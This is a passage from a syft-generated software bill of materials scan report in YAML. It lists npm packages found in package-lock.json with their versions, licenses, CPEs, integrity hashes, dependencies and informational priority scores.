severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 12c7b9072b4ac0c3
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: stream-events 1.0.5'
title: stream-events 1.0.5
description: 'Package discovered: stream-events 1.0.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: d6075f31d1f26f1b
name: stream-events
version: 1.0.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:stream-events:stream-events:1.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:stream-events:stream_events:1.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:stream_events:stream-events:1.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:stream_events:stream_events:1.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:stream:stream-events:1.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:stream:stream_events:1.0.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/stream-events@1.0.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/stream-events/-/stream-events-1.0.5.tgz
integrity: sha512-E1GUzBSgvct8Jsb3v2X15pjzN1tYebtbLaMg+eBOUOAxgbLoSbT2NS91ckc5lJD1KfLjId+jXJRgo0qnV5Nerg==
dependencies:
stubs: ^3.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 42a667b9f8ef2c86
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: stream-shift 1.0.3'
title: stream-shift 1.0.3
description: 'Package discovered: stream-shift 1.0.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 1acff9076c855611
name: stream-shift
version: 1.0.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:stream-shift:stream-shift:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:stream-shift:stream_shift:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:stream_shift:stream-shift:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:stream_shift:stream_shift:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:stream:stream-shift:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:stream:stream_shift:1.0.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/stream-shift@1.0.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/stream-shift/-/stream-shift-1.0.3.tgz
integrity: sha512-76ORR0DO1o1hlKwTbi/DM3EXWGf3ZJYO8cXX5RJwnul2DEg2oyoZyjLNoQM8WsvZiFKCRfC1O0J7iCvie3RZmQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 89e93178704235e4
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: streamsearch 1.1.0'
title: streamsearch 1.1.0
description: 'Package discovered: streamsearch 1.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c7163598759ab751
name: streamsearch
version: 1.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:streamsearch:streamsearch:1.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/streamsearch@1.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/streamsearch/-/streamsearch-1.1.0.tgz
integrity: sha512-Mcc5wHehp9aXz1ax6bZUyY5afg9u2rv5cqQI3mRrYkGC8rW2hM02jWuwjtL++LS5qinSyhj2QfLyNsuc+VsExg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d28f82c740f787aa
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: string-width 4.2.3'
title: string-width 4.2.3
description: 'Package discovered: string-width 4.2.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 6c7ed5b8c0bd71e8
name: string-width
version: 4.2.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:string-width:string-width:4.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:string-width:string_width:4.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:string_width:string-width:4.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:string_width:string_width:4.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:string:string-width:4.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:string:string_width:4.2.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/string-width@4.2.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz
integrity: sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==
dependencies:
emoji-regex: ^8.0.0
is-fullwidth-code-point: ^3.0.0
strip-ansi: ^6.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a6a2288a986748af
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: string-width 5.1.2'
title: string-width 5.1.2
description: 'Package discovered: string-width 5.1.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 303a44f8f6ca903e
name: string-width
version: 5.1.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:string-width:string-width:5.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:string-width:string_width:5.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:string_width:string-width:5.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:string_width:string_width:5.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:string:string-width:5.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:string:string_width:5.1.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/string-width@5.1.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz
integrity: sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==
dependencies:
eastasianwidth: ^0.2.0
emoji-regex: ^9.2.2
strip-ansi: ^7.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d318d3d155c6a9dd
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: string_decoder 1.1.1'
title: string_decoder 1.1.1
description: 'Package discovered: string_decoder 1.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 829e7f04cb28f180
name: string_decoder
version: 1.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:string-decoder:string-decoder:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:string-decoder:string_decoder:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:string_decoder:string-decoder:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:string_decoder:string_decoder:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:string:string-decoder:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:string:string_decoder:1.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/string_decoder@1.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz
integrity: sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==
dependencies:
safe-buffer: ~5.1.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 42e775567d560303
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: string_decoder 1.3.0'
title: string_decoder 1.3.0
description: 'Package discovered: string_decoder 1.3.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 31e1990d6adabf2b
name: string_decoder
version: 1.3.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:string-decoder:string-decoder:1.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:string-decoder:string_decoder:1.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:string_decoder:string-decoder:1.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:string_decoder:string_decoder:1.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:string:string-decoder:1.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:string:string_decoder:1.3.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/string_decoder@1.3.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/string_decoder/-/string_decoder-1.3.0.tgz
integrity: sha512-hkRX8U1WjJFd8LsDJ2yQ/wWWxaopEsABU1XfkM8A+j0+85JAGppt16cr1Whg6KIbb4okU6Mql6BOj+uup/wKeA==
dependencies:
safe-buffer: ~5.2.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 611033baae4657b2
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: strip-ansi 6.0.1'
title: strip-ansi 6.0.1
description: 'Package discovered: strip-ansi 6.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e47d9046945afbeb
name: strip-ansi
version: 6.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:strip-ansi:strip-ansi:6.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:strip-ansi:strip_ansi:6.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:strip_ansi:strip-ansi:6.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:strip_ansi:strip_ansi:6.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:strip:strip-ansi:6.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:strip:strip_ansi:6.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/strip-ansi@6.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz
integrity: sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==
dependencies:
ansi-regex: ^5.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ca95150df82b38c3
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: strip-ansi 7.2.0'
title: strip-ansi 7.2.0
description: 'Package discovered: strip-ansi 7.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: efdaea275ca01865
name: strip-ansi
version: 7.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:strip-ansi:strip-ansi:7.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:strip-ansi:strip_ansi:7.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:strip_ansi:strip-ansi:7.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:strip_ansi:strip_ansi:7.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:strip:strip-ansi:7.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:strip:strip_ansi:7.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/strip-ansi@7.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.2.0.tgz
integrity: sha512-yDPMNjp4WyfYBkHnjIRLfca1i6KMyGCtsVgoKe/z1+6vukgaENdgGBZt+ZmKPc4gavvEZ5OgHfHdrazhgNyG7w==
dependencies:
ansi-regex: ^6.2.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 680b8434591c36cc
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: strnum 2.2.3'
title: strnum 2.2.3
description: 'Package discovered: strnum 2.2.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 9368f059f77a6fca
name: strnum
version: 2.2.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:strnum:strnum:2.2.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/strnum@2.2.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/strnum/-/strnum-2.2.3.tgz
integrity: sha512-oKx6RUCuHfT3oyVjtnrmn19H1SiCqgJSg+54XqURKp5aCMbrXrhLjRN9TjuwMjiYstZ0MzDrHqkGZ5dFTKd+zg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 71b1b284c1af24b8
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: stubs 3.0.0'
title: stubs 3.0.0
description: 'Package discovered: stubs 3.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 10401a0421b092a3
name: stubs
version: 3.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:stubs:stubs:3.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/stubs@3.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/stubs/-/stubs-3.0.0.tgz
integrity: sha512-PdHt7hHUJKxvTCgbKX9C1V/ftOcjJQgz8BZwNfV5c4B6dcGqlpelTbJ999jBGZ2jYiPAwcX5dP6oBwVlBlUbxw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a4561300304da31c
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: styled-jsx 5.1.1'
title: styled-jsx 5.1.1
description: 'Package discovered: styled-jsx 5.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: b71f2c964dcb79d3
name: styled-jsx
version: 5.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:styled-jsx:styled-jsx:5.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:styled-jsx:styled_jsx:5.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:styled_jsx:styled-jsx:5.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:styled_jsx:styled_jsx:5.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:styled:styled-jsx:5.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:styled:styled_jsx:5.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/styled-jsx@5.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/styled-jsx/-/styled-jsx-5.1.1.tgz
integrity: sha512-pW7uC1l4mBZ8ugbiZrcIsiIvVx1UmTfw7UkC3Um2tmfUq9Bhk8IiyEIPl6F8agHgjzku6j0xQEZbfA5uSgSaCw==
dependencies:
client-only: 0.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d085117a189c2037
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: sucrase 3.35.1'
title: sucrase 3.35.1
description: 'Package discovered: sucrase 3.35.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 302884898f3a35c4
name: sucrase
version: 3.35.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:sucrase:sucrase:3.35.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/sucrase@3.35.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/sucrase/-/sucrase-3.35.1.tgz
integrity: sha512-DhuTmvZWux4H1UOnWMB3sk0sbaCVOoQZjv8u1rDoTV0HTdGem9hkAZtl4JZy8P2z4Bg0nT+YMeOFyVr4zcG5Tw==
dependencies:
'@jridgewell/gen-mapping': ^0.3.2
commander: ^4.0.0
lines-and-columns: ^1.1.6
mz: ^2.7.0
pirates: ^4.0.1
tinyglobby: ^0.2.11
ts-interface-checker: ^0.1.9
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 57ae1f3ed312e075
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: supports-preserve-symlinks-flag 1.0.0'
title: supports-preserve-symlinks-flag 1.0.0
description: 'Package discovered: supports-preserve-symlinks-flag 1.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: cb6982ee071dbb85
name: supports-preserve-symlinks-flag
version: 1.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:supports-preserve-symlinks-flag:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:supports-preserve-symlinks-flag:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:supports_preserve_symlinks_flag:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:supports_preserve_symlinks_flag:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:supports-preserve-symlinks:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:supports-preserve-symlinks:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:supports_preserve_symlinks:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:supports_preserve_symlinks:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:supports-preserve:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:supports-preserve:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:supports_preserve:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:supports_preserve:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:supports:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:supports:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/supports-preserve-symlinks-flag@1.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz
integrity: sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 7b659eb857ace717
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: svg-arc-to-cubic-bezier 3.2.0'
title: svg-arc-to-cubic-bezier 3.2.0
description: 'Package discovered: svg-arc-to-cubic-bezier 3.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 03465a3bffd322b9
name: svg-arc-to-cubic-bezier
version: 3.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:svg-arc-to-cubic-bezier:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:svg-arc-to-cubic-bezier:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*
source: syft-generated
